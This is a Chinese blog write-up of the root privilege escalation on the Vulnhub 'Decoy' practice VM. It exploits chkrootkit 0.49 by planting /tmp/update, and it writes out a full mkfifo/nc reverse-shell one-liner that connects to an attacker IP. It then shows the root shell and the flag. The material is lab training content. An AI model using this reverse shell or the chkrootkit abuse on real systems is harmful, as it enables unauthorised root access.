首页 > 其他分享 >Vulnhub之Decoy靶机-详细提权过程补充

Vulnhub之Decoy靶机-详细提权过程补充

时间:2023-05-30 11:23:54浏览次数:36  
标签:chkrootkit -- Decoy 提权 2020 Vulnhub 296640a3b825115a47b68fc44501c828 root 60832e

Vulnhub Decoy提权补充

在拿到用户296640a3b825115a47b68fc44501c828的密码server后,为了方便观察现象,同时开启两个shell,并且需要指定-t "bash --noprofile"以逃避受限shell,登录成功后,要修改PATH环境变量,使其包含正常的环境变量:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat SV-502/logs/log.txt 

在日志文件中看到有关chkrootkit的日志信息,chkrootkit是检查系统是否存在后门的工具。

在第1个目标主机shell中执行:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+ 23309  0.0  0.0   6076   828 pts/1    S+   22:49   0:00 grep chk

从结果发现并没有运行chkrootkit的进程

在第2个shell中执行:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------

执行第5选项,也就是病毒扫描,而这可能与chkrootkit相关,也就是一旦选择第5选项,可能就启动chkrootkit。

选择第5选项后,回到第1个shell查看进程:

但是仍然没有出现chkrootkit

此时参考exploitdb上关于0.49版本的漏洞利用方法,在/tmp创建文件名为update,此时内容随意并且赋予执行权限:

Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

然后执行honeypot.decoy

此时回到第1个shell中查看进程(需要过一点时间)

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+   560  0.0  0.0   6076   884 pts/1    S+   22:59   0:00 grep chk
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+   562  0.0  0.0   6076   820 pts/1    S+   23:00   0:00 grep chk
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
root       571  2.0  0.1   2676  1936 ?        S    23:00   0:00 /bin/sh /root/chkrootkit-0.49/chkrootkit

发现PS输出结果中有chkrootkit进程,当然到目前为止我们创建的update文件里面的内容是没有意义的字符串,接下来就是修改update的内容,修改为反向shell命令:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.230 5555 >/tmp/f' >/tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ chmod 777 /tmp/update

然后再次执行./honeypot.decoy,选择选项5,也就是扫描病毒,

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Decoy]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.109] 48104
/bin/sh: 0: can't access tty; job control turned off
# cd /root
# ls -alh
total 3.1M
drwx------  4 root                             root                             4.0K Jul  7  2020 .
drwxr-xr-x 18 root                             root                             4.0K Jun 27  2020 ..
lrwxrwxrwx  1 root                             root                                9 Jul  7  2020 .bash_history -> /dev/null
-rw-r--r--  1 root                             root                              570 Jan 31  2010 .bashrc
drwxr-xr-x  2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul 30  2009 chkrootkit-0.49
-rw-r--r--  1 root                             root                              39K Apr  9  2015 chkrootkit-0.49.tar.gz
drwxr-xr-x  3 root                             root                             4.0K Jun 27  2020 .local
-rw-r--r--  1 root                             root                             7.7K Jun 27  2020 log.txt
-rw-r--r--  1 root                             root                              148 Aug 17  2015 .profile
-rwxr-xr-x  1 root                             root                             3.0M Aug 22  2019 pspy
-rw-r--r--  1 root                             root                              924 Jul  7  2020 root.txt
-rw-r--r--  1 root                             root                              137 Jul  7  2020 script.sh
-rw-r--r--  1 root                             root                               66 Jul  7  2020 .selected_editor
-rw-r--r--  1 root                             root                              208 Jun 27  2020 .wget-hsts
# cat root.txt
  ........::::::::::::..           .......|...............::::::::........
     .:::::;;;;;;;;;;;:::::.... .     \   | ../....::::;;;;:::::.......
         .       ...........   / \\_   \  |  /     ......  .     ........./\
...:::../\\_  ......     ..._/'   \\\_  \###/   /\_    .../ \_.......   _//
.::::./   \\\ _   .../\    /'      \\\\#######//   \/\   //   \_   ....////
    _/      \\\\   _/ \\\ /  x       \\\\###////      \////     \__  _/////
  ./   x       \\\/     \/ x X           \//////                   \/////
 /     XxX     \\/         XxX X                                    ////   x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
       X        _X      *    X      **         **             x   **    *  X
      _X                    _X           x                *          x     X_


1c203242ab4b4509233ca210d50d2cc5

Thanks for playing! - Felipe Winsnes (@whitecr0wz)
# 

标签:chkrootkit,--,Decoy,提权,2020,Vulnhub,296640a3b825115a47b68fc44501c828,root,60832e
From: https://www.cnblogs.com/jason-huawen/p/17442706.html

相关文章

  • VulnHub_DC-1渗透流程
    DC-1DC-1是一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。它旨在为初学者提供挑战,但它的难易程度取决于您的技能和知识,以及您的学习能力。要成功完成此挑战,您将需要Linux技能、熟悉Linux命令行以及使用基本渗透测试工具的经验,例如可以在KaliLinux或P......
  • VulnHub-Narak靶机渗透流程
    VulnHub-NarakDescriptionNarakistheHinduequivalentofHell.YouareinthepitwiththeLordofHellhimself.CanyouuseyourhackingskillstogetoutoftheNarak?Burningwallsanddemonsarearoundeverycornerevenyourtrustytoolswillbetra......
  • Vulnhub: AI-WEB-1.0靶机
    kali:192.168.111.111靶机:192.168.111.132信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.132robosts.txt提示两个目录m3diNf0目录下存在info.php漏洞利用se3reTdir777目录下的输入框存在sql注入从phpinfo页面中得知网站根路径利用s......
  • Vulnhub靶机DevRandom CTF1.1详细测试过程
    DevRandomCTF:1.1靶机信息名称:DevRandomCTF:1.1地址:https://www.vulnhub.com/entry/devrandom-ctf-11,450/识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/DevRandom]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|S......
  • Vulnhub: Photographer 1靶机
    kali:192.168.111.111靶机:192.168.111.132信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.132目标8000端口为kokencms使用enum4linux枚举目标samba服务,发现共享文件夹enum4linux-a192.168.111.132连接目标共享文件夹,发现两个文件smbcli......
  • Vulnhub: Healthcare 1靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.130目录爆破feroxbuster-k-d1--urlhttp://192.168.111.130-w/opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lowercase-2.3-......
  • Vulnhub之DriftingBlues 5靶机详细测试过程(得到root shell)
    DriftingBlues5靶机信息名称:DriftingBlues:5地址:https://download.vulnhub.com/driftingblues/driftingblues5_vh.ova识别IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56......
  • Vulnhub: Tiki-1靶机
    kali:192.168.111.111靶机:192.168.111.133信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.133从目标网站的robots.txt文件中,发现存在目录/tiki/访问目录发现为tikicms该cms存在身份验证绕过searchsploittiki漏洞利用使用exp清空admin用......
  • Vulnhub之election靶机详细测试过程
    Election作者:jasonhuawen靶机信息名称:eLection:1URL:https://www.vulnhub.com/entry/election-1,503/识别IP地址─(kali㉿kali)-[~/Vulnhub/Election]└─$sudonetdiscover-ieth1-r192.168.56.0/24urrentlyscanning:192.168.56.0/24|ScreenView:U......
  • Linux提权
    Linux提权目录Linux提权一、Linux-内核提权二、SUID提权三、计划任务提权四、环境变量劫持提权五、SUDO提权六、通配符(ws)提权七、明文ROOT密码提权一、Linux-内核提权内核提权是利用Linux内核的漏洞进行提权的。内核漏洞进行提权一般包括三个环节:1、对目标系统进行信息收集,......